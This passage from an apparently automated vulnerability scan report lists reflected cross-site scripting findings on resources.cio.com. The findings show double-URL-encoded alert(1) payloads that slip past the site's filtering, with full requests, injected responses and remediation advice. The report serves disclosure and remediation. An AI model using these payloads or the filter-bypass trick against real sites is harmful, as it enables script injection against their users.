The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d9e0%2522%253balert%25281%2529%252f%252f33197a93f3 was submitted in the REST URL parameter 3. This input was echoed as 8d9e0";alert(1)//33197a93f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/200000223/00056590007964CIO58HH9JQ1JV8d9e0%2522%253balert%25281%2529%252f%252f33197a93f3/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "cf8d8e2abea92c96886a75c679ef5fbc"
X-Runtime: 6
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3826
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
           var reg_url = "http://reg.idgenterprise.com/reg/cio/form/200000223?SOURCE=00056590007964CIO58HH9JQ1JV8d9e0";alert(1)//33197a93f3&sHdr=0&codetype=g&pagename=pageName|White Paper:LG:3374:The Art and Science of Knowing&pagetype=prop14|White Paper" + "&elqguid=" + elqCustomerGUID;
           document.write('<iframe src="'+ reg_url +'" wid
...[SNIP]...

2.276. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000223/00056590007964CIO58HH9JQ1JV/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6193f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e55bb0344024 was submitted in the REST URL parameter 3. This input was echoed as 6193f"><script>alert(1)</script>55bb0344024 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/200000223/6193f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e55bb0344024/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "ffd0915e548f283e568c9e54e76d2eca"
X-Runtime: 5
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3804
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<iframe src="http://reg.idgenterprise.com/reg/cio/form/200000223?SOURCE=6193f"><script>alert(1)</script>55bb0344024&sHdr=0&codetype=g&pagename=pageName|White Paper:LG:3374:The Art and Science of Knowing&pagetype=prop14|White Paper" width="700" height="1450" style="position:relative;left:0px;top:0px;" frameborder="n
...[SNIP]...

2.277. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000224/00056590007963CIOS94WBH8V1I/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c0fa%2522%253balert%25281%2529%252f%252f51efbad8729 was submitted in the REST URL parameter 2. This input was echoed as 8c0fa";alert(1)//51efbad8729 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/2000002248c0fa%2522%253balert%25281%2529%252f%252f51efbad8729/00056590007963CIOS94WBH8V1I/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "37d6fceb4ae92fb4115985eb1dc4c317"
X-Runtime: 167
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 2988
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
           var reg_url = "http://reg.idgenterprise.com/reg/cio/form/2000002248c0fa";alert(1)//51efbad8729?SOURCE=00056590007963CIOS94WBH8V1I&sHdr=1&codetype=g&pagename=pageName|UNKNOWN&pagetype=prop14|UNKNOWN" + "&elqguid=" + elqCustomerGUID;
           document.write('<iframe src="'+ reg_url +'" width="700" hei
...[SNIP]...

2.278. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000224/00056590007963CIOS94WBH8V1I/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0217%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e694a86a3811 was submitted in the REST URL parameter 2. This input was echoed as e0217"><script>alert(1)</script>694a86a3811 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/e0217%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e694a86a3811/00056590007963CIOS94WBH8V1I/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "a01a1d212e0fb67cce0e6b48d8cf3d2f"
X-Runtime: 55
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3825
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<iframe src="http://www.accelacomm.com/jaw/00056590007963CIOS94WBH8V1I/7/e0217"><script>alert(1)</script>694a86a3811/" width="700" height="1450" style="position:relative;left:0px;top:0px;" frameborder="no" border="0" marginheight="0" marginwidth="0" scrolling="no">
...[SNIP]...

2.279. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000224/00056590007963CIOS94WBH8V1I/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf280%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edb3887e864 was submitted in the REST URL parameter 3. This input was echoed as bf280"><script>alert(1)</script>db3887e864 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/200000224/bf280%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edb3887e864/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "3077ba43156c4772e0306c6173b28528"
X-Runtime: 6
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3775
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<iframe src="http://reg.idgenterprise.com/reg/cio/form/200000224?SOURCE=bf280"><script>alert(1)</script>db3887e864&sHdr=0&codetype=g&pagename=pageName|White Paper:LG:3367:Information is King&pagetype=prop14|White Paper" width="700" height="1450" style="position:relative;left:0px;top:0px;" frameborder="no" border="
...[SNIP]...

2.280. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000224/00056590007963CIOS94WBH8V1I/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75f50%2522%253balert%25281%2529%252f%252f8667a0fba70 was submitted in the REST URL parameter 3. This input was echoed as 75f50";alert(1)//8667a0fba70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/200000224/00056590007963CIOS94WBH8V1I75f50%2522%253balert%25281%2529%252f%252f8667a0fba70/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "2195a2d60c55b8bfd2c219b1adf42a9b"
X-Runtime: 5
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3801
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
           var reg_url = "http://reg.idgenterprise.com/reg/cio/form/200000224?SOURCE=00056590007963CIOS94WBH8V1I75f50";alert(1)//8667a0fba70&sHdr=0&codetype=g&pagename=pageName|White Paper:LG:3367:Information is King&pagetype=prop14|White Paper" + "&elqguid=" + elqCustomerGUID;
           document.write('<iframe src="'+ reg_url +'" width="700" he
...[SNIP]...

2.281. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000225/00056590007961CIOFJENR82NVR/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 805c7%2522%253balert%25281%2529%252f%252fe2b49d6cd85 was submitted in the REST URL parameter 2. This input was echoed as 805c7";alert(1)//e2b49d6cd85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/200000225805c7%2522%253balert%25281%2529%252f%252fe2b49d6cd85/00056590007961CIOFJENR82NVR/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "22f79820d43683cc40ee4b60809ff3b2"
X-Runtime: 73
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 2988
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
           var reg_url = "http://reg.idgenterprise.com/reg/cio/form/200000225805c7";alert(1)//e2b49d6cd85?SOURCE=00056590007961CIOFJENR82NVR&sHdr=1&codetype=g&pagename=pageName|UNKNOWN&pagetype=prop14|UNKNOWN" + "&elqguid=" + elqCustomerGUID;
           document.write('<iframe src="'+ reg_url +'" width="700" hei
...[SNIP]...

2.282. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000225/00056590007961CIOFJENR82NVR/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c0ae%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea11ddcb6f84 was submitted in the REST URL parameter 2. This input was echoed as 3c0ae"><script>alert(1)</script>a11ddcb6f84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/3c0ae%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea11ddcb6f84/00056590007961CIOFJENR82NVR/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "48369e0518d2868e024b5076ba1fb82b"
X-Runtime: 84
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3825
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<iframe src="http://www.accelacomm.com/jaw/00056590007961CIOFJENR82NVR/7/3c0ae"><script>alert(1)</script>a11ddcb6f84/" width="700" height="1450" style="position:relative;left:0px;top:0px;" frameborder="no" border="0" marginheight="0" marginwidth="0" scrolling="no">
...[SNIP]...

2.283. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000225/00056590007961CIOFJENR82NVR/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 540a7%2522%253balert%25281%2529%252f%252f5289850d27 was submitted in the REST URL parameter 3. This input was echoed as 540a7";alert(1)//5289850d27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/200000225/00056590007961CIOFJENR82NVR540a7%2522%253balert%25281%2529%252f%252f5289850d27/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "8ee8f4eccf98429d6ef16af2113a4b33"
X-Runtime: 6
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3865
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
           var reg_url = "http://reg.idgenterprise.com/reg/cio/form/200000225?SOURCE=00056590007961CIOFJENR82NVR540a7";alert(1)//5289850d27&sHdr=0&codetype=g&pagename=pageName|White Paper:LG:3365:8 Essentials of Business Analytics&pagetype=prop14|White Paper" + "&elqguid=" + elqCustomerGUID;
           document.write('<iframe src="'+ reg_url +'"
...[SNIP]...

2.284. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000225/00056590007961CIOFJENR82NVR/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4451d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8452a81c58e was submitted in the REST URL parameter 3. This input was echoed as 4451d"><script>alert(1)</script>8452a81c58e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/200000225/4451d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8452a81c58e/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "a7b482d31e740d1760552dd82bf0d16c"
X-Runtime: 7
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3843
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<iframe src="http://reg.idgenterprise.com/reg/cio/form/200000225?SOURCE=